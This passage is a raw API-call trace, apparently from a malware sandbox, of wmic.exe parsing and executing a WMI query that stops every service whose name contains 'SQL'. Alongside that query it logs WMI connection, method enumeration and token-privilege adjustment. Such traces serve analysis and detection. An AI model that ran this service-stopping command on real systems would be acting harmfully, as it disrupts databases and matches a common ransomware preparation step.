(lpString="Win32_Service") returned 13 [0247.656] malloc (_Size=0x1c) returned 0x3bcea0 [0247.656] lstrlenW (lpString="Win32_Service") returned 13 [0247.656] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0247.656] lstrlenW (lpString="Win32_Service") returned 13 [0247.656] malloc (_Size=0x1c) returned 0x3b7120 [0247.656] lstrlenW (lpString="Win32_Service") returned 13 [0247.656] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffeb6450 | out: _String=0x0, _Context=0xffffffffffeb6450) returned 0x0 [0247.656] lstrlenW (lpString="") returned 0 [0247.656] lstrlenW (lpString="WHERE") returned 5 [0247.656] lstrlenW (lpString="where") returned 5 [0247.656] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0247.656] lstrlenW (lpString="/") returned 1 [0247.656] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0247.656] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQL%%'", cchCount1=19, lpString2="/", cchCount2=1) returned 3 [0247.656] lstrlenW (lpString="-") returned 1 [0247.656] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0247.656] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQL%%'", cchCount1=19, lpString2="-", cchCount2=1) returned 3 [0247.656] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0247.656] malloc (_Size=0x28) returned 0x3bcf00 [0247.656] lstrlenW (lpString="name like '%%SQL%%'") returned 19 [0247.656] lstrlenW (lpString="/") returned 1 [0247.656] lstrlenW (lpString="call") returned 4 [0247.656] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0247.657] lstrlenW (lpString="-") returned 1 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] malloc (_Size=0xa) returned 0x3b9a40 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] lstrlenW (lpString="GET") returned 3 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0247.657] lstrlenW (lpString="LIST") returned 4 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0247.657] lstrlenW (lpString="SET") returned 3 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0247.657] lstrlenW (lpString="CREATE") returned 6 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0247.657] lstrlenW (lpString="CALL") returned 4 [0247.657] lstrlenW (lpString="call") returned 4 [0247.657] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0247.657] lstrlenW (lpString="/") returned 1 [0247.657] lstrlenW (lpString="stopservice") returned 11 [0247.657] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0247.657] lstrlenW (lpString="-") returned 1 [0247.658] lstrlenW (lpString="stopservice") returned 11 [0247.658] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0247.658] lstrlenW (lpString="stopservice") returned 11 [0247.658] malloc (_Size=0x18) returned 0x3b9a60 [0247.658] lstrlenW (lpString="stopservice") returned 11 [0247.658] ??0CHString@@QEAA@XZ () returned 0x26d2b8 [0247.658] GetCurrentThreadId () returned 0x890 [0247.658] GetCurrentThreadId () returned 0x890 [0247.658] ??0CHString@@QEAA@XZ () returned 0x26d088 [0247.658] malloc (_Size=0x8) returned 0x3bcf30 [0247.658] malloc (_Size=0x18) returned 0x3b9a80 [0247.658] malloc (_Size=0x18) returned 0x3b9aa0 [0247.658] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d21390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff392950 | out: ppNamespace=0xff392950*=0x1d33a98) returned 0x0 [0247.680] free (_Block=0x3b9aa0) [0247.680] CoSetProxyBlanket (pProxy=0x1d33a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0247.680] free (_Block=0x3bcf30) [0247.681] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.681] free (_Block=0x3b9a80) [0247.681] malloc (_Size=0x18) returned 0x3b9a80 [0247.681] IWbemServices:GetObject (in: This=0x1d33a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x26d298*=0x0, ppCallResult=0x0 | out: ppObject=0x26d298*=0x1d5bfa0, ppCallResult=0x0) returned 0x0 [0247.710] free (_Block=0x3b9a80) [0247.710] IWbemClassObject:BeginMethodEnumeration (This=0x1d5bfa0, lEnumFlags=0) returned 0x0 [0247.710] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="StartService", ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x1d5c4a0) returned 0x0 [0247.710] lstrlenW (lpString="StartService") returned 12 [0247.710] lstrlenW (lpString="stopservice") returned 11 [0247.710] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0247.710] IUnknown:Release (This=0x1d5c4a0) returned 0x0 [0247.710] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="StopService", ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x1d5c4a0) returned 0x0 [0247.711] lstrlenW (lpString="StopService") returned 11 [0247.711] lstrlenW (lpString="stopservice") returned 11 [0247.711] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0247.711] malloc (_Size=0x70) returned 0x3bcf30 [0247.711] ??0CHString@@QEAA@XZ () returned 0x26cc48 [0247.711] GetCurrentThreadId () returned 0x890 [0247.711] IWbemClassObject:GetNames (in: This=0x1d5c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x26cc40 | out: pNames=0x26cc40*="\x01ƀ\x08") returned 0x0 [0247.711] SafeArrayGetLBound (in: psa=0x4d4a50, nDim=0x1, plLbound=0x26cc58 | out: plLbound=0x26cc58) returned 0x0 [0247.711] SafeArrayGetUBound (in: psa=0x4d4a50, nDim=0x1, plUbound=0x26cc54 | out: plUbound=0x26cc54) returned 0x0 [0247.711] SafeArrayGetElement (in: psa=0x4d4a50, rgIndices=0x26cc34, pv=0x26cc38 | out: pv=0x26cc38) returned 0x0 [0247.711] malloc (_Size=0x48) returned 0x3bcfb0 [0247.712] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1d5c4a0, wszProperty="ReturnValue", ppQualSet=0x26ca88 | out: ppQualSet=0x26ca88*=0x1d213b0) returned 0x0 [0247.712] malloc (_Size=0x18) returned 0x3b9a80 [0247.712] IWbemQualifierSet:Get (in: This=0x1d213b0, wszName="CIMTYPE", lFlags=0, pVal=0x26cb10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x26cb10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0247.712] free (_Block=0x3b9a80) [0247.712] malloc (_Size=0x18) returned 0x3b9a80 [0247.712] IWbemClassObject:Get (in: This=0x1d5c4a0, wszName="ReturnValue", lFlags=0, pVal=0x26cbb8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x26ca98*=2542304, plFlavor=0x0 | out: pVal=0x26cbb8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x26ca98*=19, plFlavor=0x0) returned 0x0 [0247.712] malloc (_Size=0x18) returned 0x3b9aa0 [0247.712] IWbemQualifierSet:Get (in: This=0x1d213b0, wszName="read", lFlags=0, pVal=0x26caa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff392ac0), plFlavor=0x0 | out: pVal=0x26caa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff392ac0), plFlavor=0x0) returned 0x80041002 [0247.712] free (_Block=0x3b9aa0) [0247.712] malloc (_Size=0x18) returned 0x3b9aa0 [0247.713] IWbemQualifierSet:Get (in: This=0x1d213b0, wszName="write", lFlags=0, pVal=0x26caa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff392ac0), plFlavor=0x0 | out: pVal=0x26caa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff392ac0), plFlavor=0x0) returned 0x80041002 [0247.713] free (_Block=0x3b9aa0) [0247.713] malloc (_Size=0x18) returned 0x3b9aa0 [0247.713] malloc (_Size=0x18) returned 0x3b9ac0 [0247.713] IWbemQualifierSet:Get (in: This=0x1d213b0, wszName="Description", lFlags=0, pVal=0x26cb50*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xff334293, varVal2=0x26cb58), plFlavor=0x0 | out: pVal=0x26cb50*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xff334293, varVal2=0x26cb58), plFlavor=0x0) returned 0x80041002 [0247.713] free (_Block=0x3b9ac0) [0247.713] malloc (_Size=0x18) returned 0x3b9ac0 [0247.713] lstrlenA (lpString="Not Available") returned 13 [0247.713] malloc (_Size=0x1c) returned 0x3bd000 [0247.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3222f0, cbMultiByte=-1, lpWideCharStr=0x3bd000, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0247.713] free (_Block=0x3bd000) [0247.713] IUnknown:Release (This=0x1d213b0) returned 0x0 [0247.713] malloc (_Size=0x48) returned 0x3bd000 [0247.713] malloc (_Size=0x18) returned 0x3b9ae0 [0247.713] malloc (_Size=0x48) returned 0x3bd050 [0247.713] malloc (_Size=0x70) returned 0x3bd0a0 [0247.713] malloc (_Size=0x48) returned 0x3bd120 [0247.714] free (_Block=0x3bd050) [0247.714] free (_Block=0x3bd000) [0247.714] free (_Block=0x3bcfb0) [0247.714] free (_Block=0x3b9aa0) [0247.714] free (_Block=0x3b9ac0) [0247.714] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.714] IWbemClassObject:GetMethodQualifierSet (in: This=0x1d5bfa0, wszMethod="StopService", ppQualSet=0x26d1b8 | out: ppQualSet=0x26d1b8*=0x1d213b0) returned 0x0 [0247.714] malloc (_Size=0x18) returned 0x3b9ac0 [0247.714] IWbemQualifierSet:Get (in: This=0x1d213b0, wszName="Implemented", lFlags=0, pVal=0x26d1c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4126cae75f, varVal2=0xff3344fb), plFlavor=0x0 | out: pVal=0x26d1c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4126cae75f, varVal2=0xff3344fb), plFlavor=0x0) returned 0x80041002 [0247.714] free (_Block=0x3b9ac0) [0247.714] malloc (_Size=0x18) returned 0x3b9ac0 [0247.714] malloc (_Size=0x18) returned 0x3b9aa0 [0247.715] IWbemQualifierSet:Get (in: This=0x1d213b0, wszName="Description", lFlags=0, pVal=0x26d1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff392948, varVal2=0x890), plFlavor=0x0 | out: pVal=0x26d1e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x890), plFlavor=0x0) returned 0x0 [0247.715] free (_Block=0x3b9aa0) [0247.715] malloc (_Size=0x18) returned 0x3b9aa0 [0247.715] IUnknown:Release (This=0x1d213b0) returned 0x0 [0247.715] malloc (_Size=0x70) returned 0x3bcfb0 [0247.715] malloc (_Size=0x70) returned 0x3bd170 [0247.715] malloc (_Size=0x48) returned 0x3bd030 [0247.715] malloc (_Size=0x18) returned 0x3b9b00 [0247.715] malloc (_Size=0x70) returned 0x3bd1f0 [0247.715] malloc (_Size=0x70) returned 0x3bd270 [0247.715] malloc (_Size=0x48) returned 0x3bd2f0 [0247.715] malloc (_Size=0x50) returned 0x3bd340 [0247.715] malloc (_Size=0x70) returned 0x3bd3a0 [0247.715] malloc (_Size=0x70) returned 0x3bd420 [0247.715] malloc (_Size=0x48) returned 0x3bd4a0 [0247.715] free (_Block=0x3bd2f0) [0247.715] free (_Block=0x3bd270) [0247.715] free (_Block=0x3bd1f0) [0247.715] free (_Block=0x3bd030) [0247.715] free (_Block=0x3bd170) [0247.715] free (_Block=0x3bcfb0) [0247.715] IUnknown:Release (This=0x1d5c4a0) returned 0x0 [0247.716] free (_Block=0x3bd120) [0247.716] free (_Block=0x3bd0a0) [0247.716] free (_Block=0x3bcf30) [0247.716] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="PauseService", ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x1d5c4a0) returned 0x0 [0247.716] lstrlenW (lpString="PauseService") returned 12 [0247.716] lstrlenW (lpString="stopservice") returned 11 [0247.716] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0247.716] IUnknown:Release (This=0x1d5c4a0) returned 0x0 [0247.716] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="ResumeService", ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x1d5c4a0) returned 0x0 [0247.716] lstrlenW (lpString="ResumeService") returned 13 [0247.716] lstrlenW (lpString="stopservice") returned 11 [0247.716] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0247.716] IUnknown:Release (This=0x1d5c4a0) returned 0x0 [0247.716] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="InterrogateService", ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x1d5c4a0) returned 0x0 [0247.716] lstrlenW (lpString="InterrogateService") returned 18 [0247.716] lstrlenW (lpString="stopservice") returned 11 [0247.716] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0247.716] IUnknown:Release (This=0x1d5c4a0) returned 0x0 [0247.716] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="UserControlService", ppInSignature=0x26d280*=0x1d5c520, ppOutSignature=0x26d288*=0x1d5ca20) returned 0x0 [0247.717] lstrlenW (lpString="UserControlService") returned 18 [0247.717] lstrlenW (lpString="stopservice") returned 11 [0247.717] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0247.717] IUnknown:Release (This=0x1d5c520) returned 0x0 [0247.717] IUnknown:Release (This=0x1d5ca20) returned 0x0 [0247.717] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="Create", ppInSignature=0x26d280*=0x1d5e470, ppOutSignature=0x26d288*=0x1d5e970) returned 0x0 [0247.717] lstrlenW (lpString="Create") returned 6 [0247.717] lstrlenW (lpString="stopservice") returned 11 [0247.717] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0247.717] IUnknown:Release (This=0x1d5e470) returned 0x0 [0247.718] IUnknown:Release (This=0x1d5e970) returned 0x0 [0247.718] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="Change", ppInSignature=0x26d280*=0x1d5e1f0, ppOutSignature=0x26d288*=0x1d5e6f0) returned 0x0 [0247.718] lstrlenW (lpString="Change") returned 6 [0247.718] lstrlenW (lpString="stopservice") returned 11 [0247.718] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0247.718] IUnknown:Release (This=0x1d5e1f0) returned 0x0 [0247.718] IUnknown:Release (This=0x1d5e6f0) returned 0x0 [0247.718] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="ChangeStartMode", ppInSignature=0x26d280*=0x1d5c610, ppOutSignature=0x26d288*=0x1d5cb10) returned 0x0 [0247.718] lstrlenW (lpString="ChangeStartMode") returned 15 [0247.718] lstrlenW (lpString="stopservice") returned 11 [0247.718] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0247.718] IUnknown:Release (This=0x1d5c610) returned 0x0 [0247.718] IUnknown:Release (This=0x1d5cb10) returned 0x0 [0247.718] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="Delete", ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x1d5c4a0) returned 0x0 [0247.718] lstrlenW (lpString="Delete") returned 6 [0247.718] lstrlenW (lpString="stopservice") returned 11 [0247.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0247.719] IUnknown:Release (This=0x1d5c4a0) returned 0x0 [0247.719] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="GetSecurityDescriptor", ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x1d5c640) returned 0x0 [0247.719] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0247.719] lstrlenW (lpString="stopservice") returned 11 [0247.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0247.719] IUnknown:Release (This=0x1d5c640) returned 0x0 [0247.719] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*="SetSecurityDescriptor", ppInSignature=0x26d280*=0x1d5c520, ppOutSignature=0x26d288*=0x1d5ca20) returned 0x0 [0247.719] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0247.719] lstrlenW (lpString="stopservice") returned 11 [0247.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0247.719] IUnknown:Release (This=0x1d5c520) returned 0x0 [0247.719] IUnknown:Release (This=0x1d5ca20) returned 0x0 [0247.719] IWbemClassObject:NextMethod (in: This=0x1d5bfa0, lFlags=0, pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0 | out: pstrName=0x26d278*=0x0, ppInSignature=0x26d280*=0x0, ppOutSignature=0x26d288*=0x0) returned 0x40005 [0247.719] IUnknown:Release (This=0x1d5bfa0) returned 0x0 [0247.719] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.719] lstrlenW (lpString="SET") returned 3 [0247.719] lstrlenW (lpString="call") returned 4 [0247.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0247.719] lstrlenW (lpString="CREATE") returned 6 [0247.719] lstrlenW (lpString="call") returned 4 [0247.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0247.720] free (_Block=0x3b8640) [0247.720] malloc (_Size=0x8) returned 0x3bcf30 [0247.720] lstrlenW (lpString="GET") returned 3 [0247.720] lstrlenW (lpString="call") returned 4 [0247.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0247.720] lstrlenW (lpString="LIST") returned 4 [0247.720] lstrlenW (lpString="call") returned 4 [0247.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0247.720] lstrlenW (lpString="ASSOC") returned 5 [0247.720] lstrlenW (lpString="call") returned 4 [0247.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0247.720] WbemLocator:IUnknown:AddRef (This=0x1d21390) returned 0x3 [0247.720] free (_Block=0x3b6a00) [0247.720] lstrlenW (lpString="") returned 0 [0247.720] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0247.720] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.720] malloc (_Size=0x14) returned 0x3b9b20 [0247.720] lstrlenW (lpString="XDUWTFONO") returned 9 [0247.720] GetCurrentThreadId () returned 0x890 [0247.720] GetCurrentProcess () returned 0xffffffffffffffff [0247.720] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f5c0 | out: TokenHandle=0x26f5c0*=0x298) returned 1 [0247.720] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f5b8 | out: TokenInformation=0x0, ReturnLength=0x26f5b8) returned 0 [0247.721] malloc (_Size=0x118) returned 0x3bcf50 [0247.721] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x3bcf50, TokenInformationLength=0x118, ReturnLength=0x26f5b8 | out: TokenInformation=0x3bcf50, ReturnLength=0x26f5b8) returned 1 [0247.721] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x3bcf50*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=307914546, Attributes=0x2d45), (Luid.LowPart=0x0, Luid.HighPart=3893760, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=3866968, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x10002d58), (Luid.LowPart=0x0, Luid.HighPart=3919664, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0247.721] free (_Block=0x3bcf50) [0247.721] CloseHandle (hObject=0x298) returned 1 [0247.721] lstrlenW (lpString="GET") returned 3 [0247.721] lstrlenW (lpString="call") returned 4 [0247.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0247.721] lstrlenW (lpString="LIST") returned 4 [0247.721] lstrlenW (lpString="call") returned 4 [0247.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0247.721] lstrlenW (lpString="SET") returned 3 [0247.721] lstrlenW (lpString="call") returned 4 [0247.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0247.721] lstrlenW (lpString="CALL") returned 4 [0247.721] lstrlenW (lpString="call") returned 4 [0247.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0247.721] ??0CHString@@QEAA@XZ () returned 0x26f570 [0247.721] GetCurrentThreadId () returned 0x890 [0247.722] malloc (_Size=0x18) returned 0x3b9b40 [0247.722] malloc (_Size=0x18) returned 0x3b9b60 [0247.722] malloc (_Size=0x18) returned 0x3b9b80 [0247.722] malloc (_Size=0x18) returned 0x3b9ba0 [0247.722] malloc (_Size=0x18) returned 0x3bd520 [0247.722] SysStringLen (param_1="\\\\") returned 0x2 [0247.722] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0247.722] malloc (_Size=0x18) returned 0x3bd540 [0247.722] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0247.722] SysStringLen (param_1="\\") returned 0x1 [0247.722] malloc (_Size=0x18) returned 0x3bd560 [0247.722] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0247.722] SysStringLen (param_1="root\\cimv2") returned 0xa [0247.722] free (_Block=0x3bd540) [0247.722] free (_Block=0x3bd520) [0247.722] free (_Block=0x3b9ba0) [0247.723] free (_Block=0x3b9b80) [0247.723] free (_Block=0x3b9b60) [0247.723] free (_Block=0x3b9b40) [0247.723] 